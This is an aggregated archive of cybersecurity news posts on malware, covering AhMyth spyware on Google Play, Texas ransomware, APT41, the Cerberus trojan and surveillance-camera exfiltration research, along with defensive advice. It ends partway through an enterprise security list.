Category Archives: Malware

Should you block newly registered domains? Researchers say yes

7 out of 10 newly registered domains (NDRs) are either malicious, suspicious or not safe for work, say Palo Alto Networks researchers, and advise organizations to block access to them with URL filtering. “While this may be deemed a bit aggressive by some due to potential false-positives, the risk from threats via NRDs is much greater. At the bare minimum, if access to NRDs are allowed, then alerts should be set up for additional visibility,” … More

The post Should you block newly registered domains? Researchers say yes appeared first on Help Net Security.

App tainted with Ahmyst Open-source spyware appeared on Google Play Store twice

ESET experts discovered that an Android app infected with AhMyth open-source RAT has bypassed the security of Google Play twice over two weeks.

The popular malware researcher Lukas Stefanko from ESET discovered that a malicious spyware, built on the AhMyth open-source espionage tool, was uploaded on Google Play twice over two weeks, bypassing Google security checks.

The malicious app, named Radio Balouch (or RB Music), includes functionality from AhMyth Android RAT.

RB Music is a streaming app for the Balouchi music that is traditional of the Balochistan region in south-western Asia.

“ESET researchers have discovered the first known spyware that is built on the foundations of AhMyth open-source malware and has circumvented Google’s app-vetting process. The malicious app, called Radio Balouch aka RB Music, is actually a fully working streaming radio app for Balouchi music enthusiasts, except that it comes with a major sting in its tail – stealing personal data of its users.” wrote Stafanko. “The app snuck into the official Android app store twice, but was swiftly removed by Google both times after we alerted the company to it.”

The source code of the RAT is available on GitHub since October 2017.

According to ESET experts, this is the first case of malicious apps built on AhMyth that spread through the official Google store bypassing Google’s app-vetting mechanism.

The app is able to steal contacts, harvest files stored on the device and send SMS messages from the affected device. It also implements a feature to steal SMS messages stored on the device, but this functionality can’t be utilized since Google’s recent restrictions only allow the default SMS app to access those messages.

Stafanko pointed out that the AhMyth code inside the app was not obfuscated or protected, making it very easy to be detected, by Google failed it.

The experts discovered twice different versions of the malicious Radio Balouch app on Google Play, the application had 100 downloads.

The researchers first discovered the app on Google Play on July 2, 2019, then it was removed within 24 hours. The Radio Balouch app reappeared on Google Play on July 13th, 2019, ESET discovered it and alerted Google that quickly removed it.

The malicious app was also distributed via third-party app stores, via a dedicated website, radiobalouch[.]com, via a link promoted via a related Instagram account. The expert discovered that the server was also used for the spyware’s C&C communications. The domain was registered on March 30th, 2019, and after the ESET report, it was taken down by the threat actors.

Once the app is executed, it will ask users to choose their preferred language (English or Farsi), then it starts requesting permissions such as the access to files on the device and the access to the contacts.

“Then, the app requests the permission to access contacts. Here, to camouflage its request for this permission, it suggests this functionality is necessary should the user decide to share the app with friends in their contact list. If the user declines to grant the contact permissions, the app will work regardless.” continues the report.

After the setup, the malicious app displays its home screen with music options, and allows users to register and login. This feature is fake, the user will be always authenticated for every input he will provide. Experts believe this feature has been implemented to lure credentials from the victims and try to break into other services that share the same credentials.  

“The (repeated) appearance of the Radio Balouch malware on the Google Play store should serve as a wake-up call to both the Google security team and Android users. Unless Google improves its safeguarding capabilities, a new clone of Radio Balouch or any other derivative of AhMyth may appear on Google Play.” Stefanko concludes.

“While the key security imperative “Stick with official sources of apps” still holds, it alone can’t guarantee security. It is highly recommended that users scrutinize every app they intend to install on their devices and use a reputable mobile security solution.

Pierluigi Paganini

(SecurityAffairs – ahMyth, spyware)

The post App tainted with Ahmyst Open-source spyware appeared on Google Play Store twice appeared first on Security Affairs.

Texas attackers demand $2.5 million to allow towns to access encrypted data

Crooks behind the attacks against Texas governments are now demanding $2.5 million to allow victims to access encrypted data.

The cybercriminals behind the wave of attacks that hit 23 Texas governments are now demanding $2.5 million to allow victims to access encrypted data.

The attacks started in the morning of August 16 and security experts investigating the incidents believe that it was a coordinated attack carried out by a single cyber crime gang.

Initially, it was said that at least 23 local government organizations were impacted by the ransomware attacks. The Department of Information Resources (DIR) is currently still investigating them and providing supports to mitigate the attacks, anyway evidence continues to point to a single threat actor.

The State Operations Center (SOC) was the attacks were detected.

According to the Texas Department of Information Resources (DIR) the number of impacted towns has been reduced to 22.

“As of the time of this release, responders have engaged with all twenty-two entities to assess the impact to their systems and bring them back online.” reads an update provided by the DIR.

“More than twenty-five percent of the impacted entities have transitioned from response and assessment to remediation and recovery, with a number of entities back to operations as usual.”

The city of Keene confirmed the attack and announced it is working with law enforcement to resolve a cyber incident.

Another of the towns hit by the ransomware attack, the City of Borger, confirmed that business and financial operations and services were impacted, although basic and emergency services continued to be operational.

“On the morning of August 16, 2019 the City of Borger was one of more than 20 entities in Texas that reported a ransomware attack.” reads the press release published by the City of Borger.

“Currently, Vital Statistics (birth and death certificates) remains offline, and the City is unable to take utility or other payments. Until such time as normal operations resume, no late fees will be assessed, and no services will be shut off,”

Keene Mayor Gary Heinrich told NPR the attackers are asking for $2.5 million to unlock the files.

“Well, just about everything we do at City Hall is impacted” Heinrich said.

“They got into our software provider, the guys who run our IT systems. A lot of folks in Texas use providers to do that, because we don’t have a staff big enough to have IT in house.”

Unfortunately, ransomware attacks are a big problem for US Government and City Offices, recently some cities in Florida were victims of hackers, including Key Biscayne, Riviera Beach and Lake City.

In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Pierluigi Paganini

(SecurityAffairs – Texas, ransomware)

The post Texas attackers demand $2.5 million to allow towns to access encrypted data appeared first on Security Affairs.

Block newly-registered domains to reduce security threats in your organisation

It’s no secret that there are a lot of websites on the internet hosting malicious content whether they be phishing pages, scams or malware itself. Every day we hear of new attacks, there’s a common denominator of either a user having clicked on a link to a fraudulent website or a site having played host […]… Read More

The post Block newly-registered domains to reduce security threats in your organisation appeared first on The State of Security.

Smashing Security #142: Mercedes secret sensors, smart cities, and ransomware runs riot

Darknet Diaries host Jack Rhysider joins us to discuss how cities in Texas are being hit by a wave of ransomware, how Mercedes Benz has installed a tracker in your car (but not for the reason you think), the security threats impacting smart cities, and a new feature coming to your Facebook app.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast, hosted by computer security veterans Graham Cluley and Carole Theriault.

China-linked APT41 group targets US-Based Research University

Security experts at FireEye observed Chinese APT41 APT group targeting a web server at a U.S.-based research university.

Experts at FireEye observed Chinese APT41 APT group targeting a web server at a U.S.-based research university.

The APT41 has been active since at least 2012, it was involved in both state-sponsored espionage campaigns and financially-motivated attacks since 2014. The group hit entities in several industries, including the gaming, healthcare, high-tech, higher education, telecommunications, and travel services industries.

Unlike other China-based actors, the group used custom malware in cyber espionage operations, experts observed 46 different malware families and tools in APT41 campaigns.

“APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain.” states the report published by FireEye. “Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.”


FireEye experts published a detailed report on the evolution of the group’s tactics, techniques, and procedures (TTPs), they found an overlap with other known Chinese espionage operator like BARIUM and the Winnti APT groups.

APT41 leverages several techniques to carry out the initial compromise, including spearphishing, moving laterally from trusted third parties, leveraging stolen credentials.

Experts observed APT41 using spear-phishing email with attachments such as compiled HTML (.chm) files.

The arsenal of the group includes backdoors, credential stealers, keyloggers, and rootkits. The APT41 cyber espionage group also leveraged TeamViewer to deploy its malware into the targets’ compromised environment.

The attack against a publicly-accessible web server at a U.S.-based research university took place on April 2019. The hackers exploited the CVE-2019-3396 vulnerability in Atlassian Confluence Server to compromise the systems and load additional payloads, including a variant of the China Chop web shell.

The attack involved two additional files, the HIGHNOON backdoor and a rootkit, then within the next 35 minutes, the attackers used both the China Chopper web shell and the HIGHNOON backdoor to send commands to the compromised server.

“HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy one of two embedded drivers to conceal network traffic and communicate with its command and control server to download and launch memory-resident DLL plugins.” reads the analysis published by FireEye.

Attackers used the HIGHNOON backdoor to execute a PowerShell command and download a script from PowerSploit. This script appears to be a copy of Invoke-Mimikatz post-exploitation tools, reflectively loading Mimikatz 2.0 into memory.

The hackers also conducted additional reconnaissance and downloaded two additional files, representing the dropper and encrypted/compressed payload components of the ACEHASH malware. The ACEHASH malware is a credential stealer and password dumping utility.

Summarizing the hackers were able to exploit the vulnerability in vulnerable Confluence system to execute command and deploy custom malware. While Mimikatz failed, the ACEHASH malware allowed the attackers to harvest a single credential from the system. The good news is that FireEye successfully neutralized the attack.

Pierluigi Paganini

(SecurityAffairs – APT41, hacking)

The post China-linked APT41 group targets US-Based Research University appeared first on Security Affairs.

The Cost of Dealing With a Cybersecurity Attack in These 4 Industries

A cybersecurity issue can cause unexpected costs in several different areas, which is the cost of Dealing with an attack in 4 Industries?

A cybersecurity issue can cause unexpected costs in several different areas. In addition to the monetary costs associated with things like lost productivity and improving network security to reduce the likelihood of future incidents, affected companies have to deal with the costs tied to reduced customer trust and damaged reputations.

It’s not always easy or straightforward to pinpoint the overall costs of recovering from a cyberattack. The totals also vary by industry. However, here’s some research that illuminates the various financial impacts for these four sectors.

1. Health Care

Health care is particularly vulnerable to cyberattacks. Criminals are aware that facilities typically handle large numbers of records containing exceptionally in-demand information that is 10 times more valuable on the black market than a credit card number. A report from Carbon Black showed that two-thirds of respondents said cyberattacks had gotten more sophisticated over the past year, too.

A victimized health care organization spends an average of $1.4 million to recover from a cyber incident. It also doesn’t help that many health care organizations are not promptly aware of cyberattacks. Experts say that most organizations don’t discover active cyberattacks for at least 18 months.

The longer an attack progresses without detection, the more costly the damage will likely be to fix. And, the costs go up if the health care facility does not have a cybersecurity response plan to use after an attack gets identified.

2. Retail

As people have growing opportunities to shop online, the chances for hackers to carry out lucrative cyberattacks in the retail sector also go up. Statistics from 2016 showed that the average cost per compromised retail record was $172. Some of the costs relate to hiring consultants to get to the bottom of breaches and paying fines to payment processors or credit card brands for insufficient security.

People are becoming less tolerant of retailers that have widescale data breaches. Additionally, the convenience and choice offered by online shopping increase the likelihood that if a person stops doing business with one retailer, they can probably find what they need elsewhere.

3. Manufacturing

The manufacturing industry was not always known to embrace connected technology, but that’s changing. Many brands recognize that keeping their machines connected to the internet can assist them with tracking trends, avoiding downtime and more.

One of the reasons why it’s tough to calculate a straightforward figure for cyberattacks is that there are so many related costs that may not be immediately apparent. For example, manufacturing companies can expect a cyberattack itself to cost about $1.7 million. But, other expenses can quickly stack up, including those related to lost productivity, customer churn and the need to hire extra staff members to help with cleaning up after a cyberattack.

Analysts also say that the manufacturing industry is extremely attractive to hackers. In addition to planning attacks that cause supply chain disruptions, cybercriminals may target manufacturing entities as part of nation-state attacks. Although those make up a small percentage of overall attacks, they took 500 times longer to resolve in 2017 than the previous year.

4. Finance

The very nature of the financial industry and the money it handles make the sector ripe for a cyberattack. It also tops the list of annual cybercrime costs at about $18 million.

But, the costs also vary depending on the type of attack a financial brand suffers. A report published collaboratively by two organizations showed that the average cost of a malware attack for a financial brand was $825,000. But, the expenses climb dramatically for a distributed denial of service (DDoS) attack. The expenses of those incidents are approximately $1.8 million.

The numbers of attacks on the financial industry are going up, too. Research associated with entities in the United Kingdom confirmed a five-fold increase of reported hacks on financial institutions in 2018 compared to 2017. That trend suggests that financial institutions have to be especially vigilant to protect against future attacks. Doing so often requires substantial financial resources.

Moving in a Worrying Direction

This list gives industry-specific snapshots of cybersecurity costs associated with particular industries. But, even sectors that are not on this list should be concerned about potential losses. Many cybersecurity experts agree that the expenses of cyberattacks, in general, are steadily going up.

The expenses and effort required for resolution are also impacted by the growing complexity of cybercriminals’ tactics.

Dealing with the initial aftermath of an attack is only the beginning. Companies also have to assure customers that they’ve taken steps to prevent other problems — and stay committed to that promise.

All of these aspects require significant financial investments, as well as a recognition that cyberattacks are genuine threats to tackle.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post The Cost of Dealing With a Cybersecurity Attack in These 4 Industries appeared first on Security Affairs.

Polymorphic Refers to a Malware’s Ability to Change

When it comes to malicious programs, polymorphic refers to a malware’s ability to change itself and its identifiable features in order to avoid detection. Many types of malware can take a polymorphic form, including viruses, trojans, keyloggers, bots, and many more. This technique involves continuously changing characteristics such as file name or encryption keys, so they become unrecognizable by common detection tools.

Polymorphic refers to a malware’s ability to evade pattern-matching detection techniques, which many security solutions rely on, including antivirus programs. While it can change some of its characteristics, the primary purpose of the malware remains the same. A virus, for example, would continue to infect other devices even if its signature has changed. Worst of all, even if the new signature is detected and added into a security database, the polymorphic malware can simply change again and continue avoiding detection.

Polymorphic Malware Examples

It has been found that 97% of all malware infections today make use of polymorphic techniques. New waves of tactics have been coming in since the past decade. Popular examples of how polymorphic refers to a malware’s ability to infiltrate systems are:

Storm Worm Email

There was an infamous spam email initially sent in 2007. The subject line read, “230 dead as storm batters Europe.” This email became responsible for 8% of all malware infections in the world at one point. The email’s attachment installed a win32com service, along with a trojan, once opened, which essentially transformed the computer into a bot. The reason this malware was so difficult to detect is because the malware morphed every 30 minutes, which is part of the reason that polymorphic refers to a malware’s ability to morph.

CryptoWall Ransomware

Polymorphic refers to a malware’s ability to get into your computer and stay there undetected by changing its characteristics every now and then. What made the CryptoWall Ransomware even more dangerous and difficult to detect is that it essentially changed for every user it infected, making it unique for everyone.

Threat of Polymorphic Malware

Many malware today make use of a certain polymorphic capability that renders traditional antivirus solutions quite helpless. These programs, along with firewalls and IPS, used to be enough to secure one’s device, but this advancement now beats these precautions. Many prevention methods are failing to stop polymorphic attacks, which is part of the reason that polymorphic refers to a malware’s ability to be flexible when inside a system

Best Practices Against Polymorphic Malware

Polymorphic refers to a malware’s ability to change itself. In this case, in order to protect your devices and your company, you will need to use a layered approach to security that combines people, processes, and technology. Here are best practices you can use to protect against polymorphic malware:

Update your software

This is a straightforward way to keep yourself protected. Keep all programs and tools used in the company updated. Manufacturers usually release critical security updates to patch known vulnerabilities. Using outdated software only makes your systems more open to attacks.

Password maintenance

When it comes to passwords, each employee should be required to use strong ones that contain both upper- and lower-case characters, numbers, and symbols. They should also regularly change their passwords as well.

Report suspicious emails

If an employee receives a suspicious email, this should be reported at once. Do not open emails from unknown or suspicious senders, and never open their attachments.

Use behavior-based detection tools

Polymorphic refers to a malware’s ability to change some of its characteristics in order to avoid detection by conventional tools. But you can use behavior detection in order to pinpoint threats in real time. These tools rely on patterns rather than the software itself, so it is a good defense against polymorphic malware.

Also Read,

Understanding What Is Malware Analysis

Pale Moon Archive Server Infected With Malware

WannaHydra – The Latest Malware Threat For Android Devices


The post Polymorphic Refers to a Malware’s Ability to Change appeared first on .

Alert! 27 apps found on Google Play Store that prompt you to install Fake Google Play Store

Quick Heal Security Lab spotted 27 malicious apps of dropper category on official “Google Play Store”. These apps have been removed from Play Store after Quick Heal Security Lab reported it to Google last week. These apps continuously show installation prompt for fake “Google Play Store”. If any user falls…

Blinking Red Light of Death for Cameras

Cameras you can find on street corners, offices, and public spaces can all be used by attackers in one way or another in order to steal sensitive information. Researchers from the Ben-Gurion University of the Negev were able to create a method to use infrared (which can look like a blinking red light) from certain cameras to exfiltrate data coming from a targeted network by simply encoding the data, then sending it through infrared signals. They created a malware called aIR-Jumper that could be used on a machine within the targeted network to control the cameras.

The researchers noted that:

“Many surveillance and security cameras are equipped with IR LEDs which enable night vision. We show that malware residing within the internal networks of the organization can control these IR LEDs, turning them on and off or controlling their IR intensity.

“We implement a malware prototype and show that binary data can be encoded over the IR signals and leaked to an attacker from a distance of tens of meters away. Notably, many surveillance and security cameras monitor public areas, and therefore attackers can easily establish a line of sight with them.”

This research essentially uncovered that surveillance cameras can be used as a covert channel in order to steal passwords, keys, and other sensitive data. This can be done by first gaining access to the network by means of a malware installed, such as through a phishing scam. This malicious program can then scan the network’s IP in search for cameras. They are easily identified by their protocol or MAC addresses.

Once this is done, the malware program can then connect to the cameras. Even if they are password protected, that would be easy to circumvent at this point.

“The malware in the network collects sensitive data that it wants to exfiltrate. When the data is collected, the malware transmits it by encoding it over the IR signals emitted from the camera’s night vision IR LEDs. Exfiltration may take place at predefined times or as the result of a trigger from the attacker side. An attacker located outside the secured facility (e.g., on the street) can receive the IR signals by carrying a standard video camera that is aimed at the transmitting surveillance camera,” the paper says. “The received video is then processed in order to decode the transmitted data.

“An attacker located outside the secured facility (e.g., on the street) generates invisible IR signals by using IR LEDs. The IR signals are modulated with the C&C messages to be delivered to the malware. The video stream recorded by the surveillance camera is received by the malware which processes and decodes the transmitted data,” the researchers said.

While the malware created is simply a proof-of-concept, all the necessary elements to achieve this are there.

Also Read,

Canon DSLR Camera, The “Unlikely Likely” Candidate For Ransomware Infection

A New Malware Called Silex Targets IoT Devices

WannaHydra – The Latest Malware Threat For Android Devices

The post Blinking Red Light of Death for Cameras appeared first on .

Psychological Tricks of the Malware Trade

As a Professional Services Consultant, I have the pleasure of traveling all around the globe meeting clients and talking to a wide variety of IT security professionals who form the front line of defence against malware. One of my favorite topics is how people got their start in their careers in IT, but when I […]… Read More

The post Psychological Tricks of the Malware Trade appeared first on The State of Security.

Analytics 101

From today’s smart home applications to autonomous vehicles of the future, the efficiency of automated decision-making is becoming widely embraced. Sci-fi concepts such as “machine learning” and “artificial intelligence” have been realized; however, it is important to understand that these terms are not interchangeable but evolve in complexity and knowledge to drive better decisions.

Distinguishing Between Machine Learning, Deep Learning and Artificial Intelligence

Put simply, analytics is the scientific process of transforming data into insight for making better decisions. Within the world of cybersecurity, this definition can be expanded to mean the collection and interpretation of security event data from multiple sources, and in different formats for identifying threat characteristics.

Simple explanations for each are as follows:

  • Machine Learning: Automated analytics that learn over time, recognizing patterns in data.  Key for cybersecurity because of the volume and velocity of Big Data.
  • Deep Learning: Uses many layers of input and output nodes (similar to brain neurons), with the ability to learn.  Typically makes use of the automation of Machine Learning.
  • Artificial Intelligence: The most complex and intelligent analytical technology, as a self-learning system applying complex algorithms which mimic human-brain processes such as anticipation, decision making, reasoning, and problem solving.

Benefits of Analytics within Cybersecurity

Big Data, the term coined in October 1997, is ubiquitous in cybersecurity as the volume, velocity and veracity of threats continue to explode. Security teams are overwhelmed by the immense volume of intelligence they must sift through to protect their environments from cyber threats. Analytics expand the capabilities of humans by sifting through enormous quantities of data and presenting it as actionable intelligence.

While the technologies must be used strategically and can be applied differently depending upon the problem at hand, here are some scenarios where human-machine teaming of analysts and analytic technologies can make all the difference:

  • Identify hidden malware with Machine Learning: Machine Learning algorithms recognize patterns far more quickly than your average human. This pattern recognition can detect behaviors that cause security breaches, whether known or unknown, periodically “learning” to become smarter. Machine Learning can be descriptive, diagnostic, predictive, or prescriptive in its analytic assessments, but typically is diagnostic and/or predictive in nature.
  • Defend against new threats with Deep Learning: Complex and multi-dimensional, Deep Learning reflects similar multi-faceted security behaviors in its actual algorithms; if the situation is complex, the algorithm is likely to be complex. It can detect, protect, and correct old or new threats by learning what is reasonable within any environment and identifying outliers and unique relationships.  Deep Learning can be descriptive, diagnostic, predictive, and prescriptive as well.
  • Anticipate threats with Artificial Intelligence: Artificial Intelligence uses reason and logic to understand its ecosystem. Like a human brain, AI considers value judgements and outcomes in determining good or bad, right or wrong.  It utilizes a number of complex analytics, including Deep Learning and Natural Language Processing (NLP). While Machine Learning and Deep Learning can span descriptive to prescriptive analytics, AI is extremely good at the more mature analytics of predictive and prescriptive.

With any security solution, therefore, it is important to identify the use case and ask “what problem are you trying to solve” to select Machine Learning, Deep Learning, or Artificial Intelligence analytics.  In fact, sometimes a combination of these approaches is required, like many McAfee products including McAfee Investigator.  Human-machine teaming as well as a layered approach to security can further help to detect, protect, and correct the most simple or complex of breaches, providing a complete solution for customers’ needs.

The post Analytics 101 appeared first on McAfee Blogs.

Understanding What Is Malware Analysis

What is malware analysis? This is the process involved in studying and learning how a particular malware works and what it can do. Their code can differ radically from one another, so they can have many functionalities. But the main purpose of these malicious programs is to gain information from an infected device without the user’s knowledge or authorization.

Malware Analysis Use Cases

Computer Security

One of the use cases in understanding what is malware analysis is to determine if an organization is indeed infected with a malware, its type, and impact on the network so a response team can formulate the right actions to get rid of it.

Malware Research

Understanding what and how malware works is one of the best defenses against it. This leads to the best understanding of malicious programs and what different organizations can do to implement proactive security.

Extracting Indicators of Compromise

Software solution sellers conduct malware analysis in bulk to find any new indicators of compromise, which can help an organization defend itself against potential attacks.

Four Stages of Malware Analysis

In understanding what is malware analysis, it is important to look at the four stages it undergoes.

Automated Analysis

If you find a suspicious program inside the organization’s network, the easiest way to determine if it is a threat is to make use of full-automated analysis programs. They can quickly find out the functionalities and purpose of a potential malware. While not the most comprehensive solution, it is the fastest.

Static Property Analysis

Looking at the static properties of a malware provides a more in-depth look at what it can do. This is safe because looking at the static properties does not entail running the program. This step should show elementary-level indicators of compromise.

Interactive Behavior Analysis

Placing a malicious program in an isolated laboratory allows for safe observation of what it can do. The information that an analyst gathers from this will allow them to replicate it and implement automated tools for faster and easier discovery and prevention.

Reverse Manual Coding

The most comprehensive way to understand what is malware analysis is manually reverse-engineering its code. This provides the knowledge of what the malware is, what it can do, and what the organization can implement in order to defend against it.

Also Read,

What is Malware?

Static Malware Analysis Vs Dynamic Malware Analysis

Automated Malware Analysis in the Cloud

The post Understanding What Is Malware Analysis appeared first on .

Cyber News Rundown: Hookup App Exposes Users

Reading Time: ~ 2 min.

Hookup App Leaks User Locations

Geo-locating and other sensitive data has been leaked from the hookup app 3fun, exposing the information for more than 1.5 million users. While some dating apps using trilateration to find nearby users, 3fun showed location data capable of tracing a user to a specific building or floor. Though users had the option to disable coordinate tracking, that data was nevertheless stored and available through the app’s API. 3fun has since resolved the leak and has hopefully implemented stronger security measures considering the private nature of their client’s activities.

Ransomware Attacks on DSLR Cameras

Malware authors continue to find new victims, as a ransomware variant has been found to be remotely attacking Canon DSLR cameras and demanding a ransom to regain access to the device. Researchers have found multiple vulnerabilities that could allow attackers to perform any number of critical functions on the cameras, including displaying a ransom note and remotely taking pictures with the camera. Fortunately, Canon has already begun issuing patches for some of its affected devices, though it’s taking longer to fully secure others.

Take back your privacy. Learn more about the benefits of a VPN.

Google Drive Exploit Allows Phishing Campaign to Flourish

A new phishing campaign has been discovered that uses a legitimate Google Drive account to launch a phishing campaign that impersonates the CEO asking the victim to open the Google Docs file and navigate to the phishing site’s landing page. Luckily for victims, the campaign has a few tells. The phony CEO email address uses a non-conforming naming convention and the email itself appears to be a hastily compiled template.

British Airways Data Leak

British Airways has again come under scrutiny, this time after it was discovered that their e-ticketing system was leaking sensitive passenger data. The leak stems from flight check-in links that were sent out to customers containing both their surname and booking confirmation numbers completely unencrypted within the URL. Even more worrisome, this type of vulnerability has been well-known since last February when several other airlines were found to have the same issue by the same security firm.

Android Trojan Adds New Functionality

Following in the footsteps of Anubis, an Android banking Trojan for which source code was recently revealed, Cerberus has quickly filled the void without actually borrowing much of that code. One major change is that Cerberus implemented a new method of checking if the device is physically moving or not, in hopes of avoiding detection by both the victim and any researchers who may be analyzing it. Additionally, this variant uses phishing overlays from several popular sites to further collect any login credentials or payment card data.

The post Cyber News Rundown: Hookup App Exposes Users appeared first on Webroot Blog.

The Cerberus Banking Trojan: 3 Tips to Secure Your Financial Data

A new banking trojan has emerged and is going after users’ Android devices. Dubbed Cerberus, this remote access trojan allows a distant attacker to take over an infected Android device, giving the attacker the ability to conduct overlay attacks, gain SMS control, and harvest the victim’s contact list. What’s more, the author of the Cerberus malware has decided to rent out the banking trojan to other cybercriminals as a means to spread these attacks.

According to The Hacker News, the author claims that this malware was completely written from scratch and doesn’t reuse code from other existing banking trojans. Researchers who analyzed a sample of the Cerberus trojan found that it has a pretty common list of features including the ability to take screenshots, hijacking SMS messages, stealing contact lists, stealing account credentials, and more.

When an Android device becomes infected with the Cerberus trojan, the malware hides its icon from the application drawer. Then, it disguises itself as Flash Player Service to gain accessibility permission. If permission is granted, Cerberus will automatically register the compromised device to its command-and-control server, allowing the attacker to control the device remotely. To steal a victim’s credit card number or banking information, Cerberus launches remote screen overlay attacks. This type of attack displays an overlay on top of legitimate mobile banking apps and tricks users into entering their credentials onto a fake login screen. What’s more, Cerberus has already developed overlay attacks for a total of 30 unique targets and banking apps.

So, what can Android users do to secure their devices from the Cerberus banking trojan? Check out the following tips to help keep your financial data safe:

  • Be careful what you download.Cerberus malware relies on social engineering tactics to make its way onto a victim’s device. Therefore, think twice about what you download or even plug into your device.
  • Click with caution.Only click on links from trusted sources. If you receive an email or text message from an unknown sender asking you to click on a suspicious link, stay cautious and avoid interacting with the message altogether.
  • Use comprehensive security. Whether you’re using a mobile banking app on your phone or browsing the internet on your desktop, it’s important to safeguard all of your devices with an extra layer of security. Use robust security software like McAfee Total Protection so you can connect with confidence.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post The Cerberus Banking Trojan: 3 Tips to Secure Your Financial Data appeared first on McAfee Blogs.

New “Norman” Malware Took Part in Large-Scale Cryptominer Infection

Researchers identified a large-scale cryptocurrency miner infection in which a new malware family called “Norman” took part. The Varonis Security Research team made the discovery while investigating a cryptominer infection at a mid-sized company. Here’s what they found through this effort: Almost every server and workstation was infected with malware. Most were generic variants of […]… Read More

The post New “Norman” Malware Took Part in Large-Scale Cryptominer Infection appeared first on The State of Security.

Smashing Security #141: Black Hat and Bridezillas

Say cheese to ransomware on your camera! A sponsored speech at Black Hat causes uproar, and should you trust that Lightning cable you’re about to plug into your MacBook?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by The Cyberwire’s Dave Bittner.

Cyber News Rundown: Children’s Tablets Show Vulnerabilities

Reading Time: ~ 2 min.

Children’s Tablets Leave Users Vulnerable

At least one LeapPad tablet designed specifically for children has been found to harbor critical vulnerabilities in the app Pet Chat that could allow unauthorized access to online traffic. The vulnerabilities could be used locate the tablet’s owner by creating a temporary WiFi network to help the user connect with other devices in the area. In addition to the remote access, local attackers would be able to send messages to children through non-HTTPS communications.

UK Universities Lacking Security

A recent study found that nearly 65% of the UK’s top universities are currently operating with sub-standard cybersecurity, especially during the time that students would be sitting for final exams. Among the remaining 35% of universities that did have some domain authentication, only 5% of those were using settings that would fully block phishing emails. If UK university students are requesting any login changes, they should be cautious when opening anything they receive, as the message may be compromised.

Intel CPU Patch Issued by Microsoft

Microsoft just released a patch for an Intel CPU vulnerability that was brought to light in 2012. The flaw could have been used to breach memory data from the device. The researchers who discovered it found they could easily leak sensitive kernel memory data into the normal user operations, even though a system normally doesn’t allow this. Additionally, this vulnerability would allow for speculative execution, which is when the system begins executing certain operations pre-emptively, and simply deleting those that don’t occur.

AT&T Employees Bribed to Unlock Phones

Employees of AT&T were found to be illicitly installing hardware onto corporate systems that would allow an attacker to unlock phones that were prevented from being used on other mobile providers. Even though some of the conspirators were eventually fired, many continued to work from within and from outside the company to further compromise nearly 2 million individual devices until the scam, which had been ongoing for more than five years, was discovered.

Mobile Bank Customers’ PINs Exposed

Customers of Monzo, a mobile-only bank in the UK, are being warned to change their PINs after many customers’ were leaked into internal log files. Fortunately, the data wasn’t made available outside of the company and the problem of PINs being stored in an alternate location has been resolved. Even after the company fixed the data leak, though, many customers were still suspicious when receiving an email informing them of the PIN reset issue.

The post Cyber News Rundown: Children’s Tablets Show Vulnerabilities appeared first on Webroot Blog.

Enterprises can begin securing their endpoints by following these five simple steps.

Estimated reading time: 3 minutes

Sustainable enterprise security is both a great practice and a core business process. Enterprises are increasingly becoming aware of the diverse & intense nature of threats that exist in cybersphere and the damage it can cause – that’s where strong enterprise security solutions come in.

This is step one – enterprise security consists of ever-evolving complex layers that are never in stasis. Hence, after every cycle, security mechanisms only tend to get stronger. However, cyberattackers are getting extremely savvy and sophisticated in their malware onslaught, ensuring that attacks are timed to penetrate endpoints during cybersecurity transitional phases.

Hence, here are some easy-to-prevent flaws that can creep in when enterprises try to secure their endpoints.

  1. Lack of proper enterprise security policies

Enterprise security policies cannot be ad-hoc – this process needs to be implemented right from the beginning, and that is where strong enterprise security takes root. The best strategies can be ineffective if they are not backed up with strong security policies.

When it comes to enterprise security, organizations must be proactive in drafting policies. The crux of these security policies should consist of employee dos and don’ts, workforce collaboration that supports cybersecurity, human resource initiatives on malware literacy, among many others and should be complied to and regularly updated so that business security is never at risk.

  1. Inability to prioritize security integration of mobiles into enterprise networks

Mobile phones as work devices are seeing increasing adoption in the enterprise. Employees, that leverage this facility need to bind their devices with enterprise security ports so that business-critical data is not compromised. Due to rising attacks on mobile devices, Enterprise Mobility Management (EMM) has become a must for businesses of all sizes that allow this facility. Solutions like Seqrite mSuite are excellent solutions through which employees can safely access productivity apps on BYOD (Bring Your Own Device) or CYOD (Choose Your Own Device) platforms while maintaining strong security.

  1. Compliance with regulations

Most companies nowadays operate under some sort of regulatory control of their data, for example, HIPAA for private health information or the FERPA for student records. Often this information is stored in the cloud with the intention of keeping this ultra-sensitive data hidden from cybercriminals. As such, leaking of this information can have serious consequences – hence enterprises should be vigilant about being compliant about the nature of data and it’s storage.

  1. Faulty access permission

Enterprises can build the strongest firewalls at par with military standards, but the framework will collapse if appropriate access control mechanisms are not put in place.  Essentially, system administrators need to grant precise access to business users based on their role in the organization. This ensures that insider breaches do not happen and sensitive information remains confidential. Also, if hackers gain direct access to employee systems, they can break-in creating a demolition kind of scenario for any business.

  1. Not taking employees into confidence

